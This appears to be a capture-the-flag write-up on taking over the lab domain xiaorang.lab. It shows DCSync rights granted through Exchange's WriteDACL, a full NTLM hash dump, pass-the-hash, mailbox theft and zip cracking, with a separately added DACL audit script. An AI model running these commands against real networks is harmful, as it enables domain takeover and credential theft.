   / /\ \ | |  | | | '_ \|  _/ _ \   Tools that collect information from domain
  / ____ \| |__| | | | | | || (_) |
 /_/    \_\_____/|_|_| |_|_| \___/   v1.5 by lzz

[i] Try to connect '172.22.3.2'
[c] Auth Domain: xiaorang.lab
[c] Auth user: XIAORANG-EXC01$
[c] Auth hash: 55c05b3a95ba11efa84aa33e20861e6f
[c] connected successfully,try to dump domain info
[i] DomainVersion found!
[+] Windows 2016 Server operating system
[i] Domain SID:
[+] S-1-5-21-533686307-2117412543-4200729784
[i] Domain MAQ found
[+] 10
[i] Domain Account Policy found
[+] pwdHistory: 24
[+] minPwdLength: 7
[+] minPwdAge: 1(day)
[+] maxPwdAge: 10675199(day)
[+] lockoutThreshold: 0
[+] lockoutDuration: 30(min)
[i] Domain Controllers: 1 found
[+] XIAORANG-WIN16$ ==>>> Windows Server 2016 Datacenter [10.0 (14393)] ==>>> 172.22.3.2
[i] ADCS has not found!
[i] Domain Exchange Server: 1 found
[+] XIAORANG-EXC01$ ==>>> Exchange Server 2016 ==>>> 172.22.3.9
[i] Domain All DNS:
[+] Domain Dns 3 found,Saved in All_DNS.csv
[i] Domain Trusts: 0 found
[i] SPN: 59 found
[i] Domain GPOs: 2 found
[i] Domain Admins: 1 users found
[+]Administrator
[i] Enterprise Admins: 1 users found
[+]Administrator
[i] administrators: 1 users found
[+]Administrator
[i] Backup Operators: 0 users found
[i] Users: 27 found
[i] User with Mail: 23 found
[i] Only_name_and_Useful_Users: 14 found
[i] Only_admincount=1_andUseful_Users: 1 found
[i] Locked Users: 0 found
[i] Disabled Users: 13 found
[i] Users with passwords not set to expire: 13 found
[i] Domain Computers: 3 found
[i] Only_name_and_Useful_computers: 3 found
[i] Groups: 69 found
[i] Domain OUs: 2 found
[i] LAPS Not found
[i] LAPS passwords: 0 found
[i] SensitiveDelegate Users: 0 found
[i] AsReproast Users: 0 found
[i] Kerberoast Users: 1 found
[+] CN=krbtgt,CN=Users,DC=xiaorang,DC=lab ==>>> kadmin/changepw
[i] SIDHistory Users: 0 found
[i] CreatorSID Users: 0 found
[i] RBCD Users: 0 found
[i] Unconstrained Deligation Users: 0 found
[i] Constrained Deligation Users: 0 found
[i] Krbtgt password last set time: 2022-10-23 14:40:45 +0800 CST
[i] CSVs written to 'csv' directory in C:\Users\calm\Desktop
[i] Execution took 2.1943333s

WriteDACL

By default the Exchange machine account holds WriteDACL over the domain, so it can grant DCSync.
The Exchange machine account is a member of the Exchange Windows Permissions group, and that group has the right to write the domain's ACL, so we can grant DCSync rights to the domain user Zhangtong whose hash we just obtained via mimikatz.
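An added defender-side example, not code from the writeup or from dacledit/bloodyAD: a small audit of a domain-object DACL that flags the two conditions this section relies on, principals outside the expected set holding both replication extended rights (DCSync), and principals holding WriteDacl/WriteOwner on the domain object (able to grant them). The ACE list is constructed to mirror xiaorang.lab after the step above; the extended-right GUIDs and access-mask bits are the real Active Directory values, while inheritance and ACE ordering are ignored and deny ACEs are applied as a simple subtraction.

```python
"""Audit a domain-object DACL for DCSync rights and for who can grant them.

Added example, not code from the writeup or from dacledit / bloodyAD. The ACE
list is constructed to mirror this section: the Exchange Windows Permissions
group holds WriteDacl on the domain object, and that has been used to give the
user Zhangtong both replication extended rights. The GUIDs and access-mask
bits are the real Active Directory values; inheritance and ACE ordering are
ignored, and deny ACEs are applied as a simple subtraction.
"""

# Access-mask bits from ADS_RIGHTS_ENUM
RIGHT_DS_CONTROL_ACCESS = 0x00000100  # an extended right, scoped by object_type
RIGHT_WRITE_DAC = 0x00040000
RIGHT_WRITE_OWNER = 0x00080000
RIGHT_GENERIC_ALL = 0x10000000

# Extended-right GUIDs that, held together, allow DCSync (replicating secrets)
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"      # DS-Replication-Get-Changes
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"  # DS-Replication-Get-Changes-All

# Principals expected to hold these rights on the domain object (constructed baseline)
EXPECTED_DCSYNC = {"Administrators", "Domain Admins", "Enterprise Admins",
                   "Enterprise Domain Controllers", "SYSTEM"}
EXPECTED_DACL_WRITERS = {"Administrators", "Domain Admins", "Enterprise Admins", "SYSTEM"}


def ace(trustee, mask, object_type=None, deny=False):
    """Build one access-control entry as a plain dict."""
    return {"trustee": trustee, "mask": mask, "object_type": object_type, "deny": deny}


def capabilities(mask, object_type):
    """Map one ACE's mask (+ optional extended-right GUID) to the capabilities we track."""
    if mask & RIGHT_GENERIC_ALL:
        return {"GET_CHANGES", "GET_CHANGES_ALL", "WRITE_DACL"}
    caps = set()
    if mask & RIGHT_DS_CONTROL_ACCESS:
        guid = (object_type or "").lower()
        if not guid:                      # unscoped control access = every extended right
            caps |= {"GET_CHANGES", "GET_CHANGES_ALL"}
        elif guid == GET_CHANGES:
            caps.add("GET_CHANGES")
        elif guid == GET_CHANGES_ALL:
            caps.add("GET_CHANGES_ALL")
    if mask & (RIGHT_WRITE_DAC | RIGHT_WRITE_OWNER):
        caps.add("WRITE_DACL")            # WriteOwner -> take ownership -> rewrite the DACL
    return caps


def effective_rights(dacl):
    """Collapse a DACL into {trustee: set of capabilities}, subtracting deny ACEs."""
    allowed, denied = {}, {}
    for entry in dacl:
        bucket = denied if entry["deny"] else allowed
        bucket.setdefault(entry["trustee"], set()).update(
            capabilities(entry["mask"], entry["object_type"]))
    return {t: caps - denied.get(t, set()) for t, caps in allowed.items()}


def _short(trustee):
    """Strip a DOMAIN\\ prefix so group names compare against the baseline."""
    return trustee.rsplit("\\", 1)[-1]


def audit(dacl):
    """Return (unexpected DCSync holders, unexpected DACL writers) as sorted lists."""
    rights = effective_rights(dacl)
    dcsync = sorted(t for t, c in rights.items()
                    if {"GET_CHANGES", "GET_CHANGES_ALL"} <= c and _short(t) not in EXPECTED_DCSYNC)
    writers = sorted(t for t, c in rights.items()
                     if "WRITE_DACL" in c and _short(t) not in EXPECTED_DACL_WRITERS)
    return dcsync, writers


# Constructed DACL for DC=xiaorang,DC=lab after the bloodyAD step in this section.
SAMPLE_DOMAIN_DACL = [
    ace("Administrators", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("Administrators", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL),
    ace("Domain Controllers", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("Enterprise Domain Controllers", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),
    ace("Enterprise Domain Controllers", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL),
    ace("XIAORANG\\Domain Admins", RIGHT_GENERIC_ALL),
    ace("XIAORANG\\Exchange Windows Permissions", RIGHT_WRITE_DAC),  # the Exchange default this section abuses
    ace("XIAORANG\\Zhangtong", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES),       # written via WriteDacl
    ace("XIAORANG\\Zhangtong", RIGHT_DS_CONTROL_ACCESS, GET_CHANGES_ALL),
]

if __name__ == "__main__":
    holders, writers = audit(SAMPLE_DOMAIN_DACL)
    print("unexpected DCSync holders:", holders)   # ['XIAORANG\\Zhangtong']
    print("unexpected DACL writers:", writers)     # ['XIAORANG\\Exchange Windows Permissions']
```

The same audit applied to the pre-attack DACL would already flag the Exchange Windows Permissions ACE, which is the condition to fix (or monitor for ACL changes on the domain object) rather than the DCSync grant that follows from it.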

proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :55c05b3a95ba11efa84aa33e20861e6f -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

That errored out here, so switch tools:

proxychains python3 bloodyAD.py -d xiaorang.lab -u 'XIAORANG-EXC01$' -p :55c05b3a95ba11efa84aa33e20861e6f --host 172.22.3.2 add dcsync Zhangtong

Run DCSync to get the domain hashes, then pass-the-hash.

proxychains impacket-secretsdump xiaorang.lab/XIAORANG-EXC01\$@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b8fa79a52e918cb0cbcd1c0ede492647:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\$431000-7AGO1IPPEUGJ:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_46bc0bcd781047eba:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2554056e362e45ba9:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_ae8e35b0ca3e41718:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_341e33a8ba4d46c19:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_3d52038e2394452f8:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_2ddd7a0d26c84e7cb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_015b052ab8324b3fa:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_9bd6f16aa25343e68:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\SM_68af2c4169b54d459:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xiaorang.lab\HealthMailbox8446c5b:1135:aad3b435b51404eeaad3b435b51404ee:6a049c17ae6f214d0ce0bb958be94c7a:::
xiaorang.lab\HealthMailbox0d5918e:1136:aad3b435b51404eeaad3b435b51404ee:33cd42e4c654333ef6118bea55f376ba:::
xiaorang.lab\HealthMailboxeda7a84:1137:aad3b435b51404eeaad3b435b51404ee:1e89e23e265bb7b54dc87938b1b1a131:::
xiaorang.lab\HealthMailbox33b01cf:1138:aad3b435b51404eeaad3b435b51404ee:0eff3de35019c2ee10b68f48941ac50d:::
xiaorang.lab\HealthMailbox9570292:1139:aad3b435b51404eeaad3b435b51404ee:e434c7db0f0a09de83f3d7df25ec2d2f:::
xiaorang.lab\HealthMailbox3479a75:1140:aad3b435b51404eeaad3b435b51404ee:c43965ecaa92be22c918e2604e7fbea0:::
xiaorang.lab\HealthMailbox2d45c5b:1141:aad3b435b51404eeaad3b435b51404ee:4822b67394d6d93980f8e681c452be21:::
xiaorang.lab\HealthMailboxec2d542:1142:aad3b435b51404eeaad3b435b51404ee:147734fa059848c67553dc663782e899:::
xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:b9df9852037915b5f26114769ace114a:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:b0d89dce8c89f4a43758961e8f782174:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:74d63202f94c220e09056568feafa894:::
[*] Cleaning up...

Pass-the-hash:

proxychains python3 wmiexec.py xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2
type C:\Users\Administrator\flag\flag.txt

Next I tried pass-the-hash against the other machine, but there was no flag. Connecting over SMB, I found an archive on Lumia's desktop (brute-forcing it did not work). In the end the route is to dump the mailbox: https://github.com/Jumbo-WJB/PTH_Exchange

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

This yields a phone number and a username; brute-force the archive:

zip2john secret.zip >zip.txt
john --wordlist=1.txt zip.txt

18763918468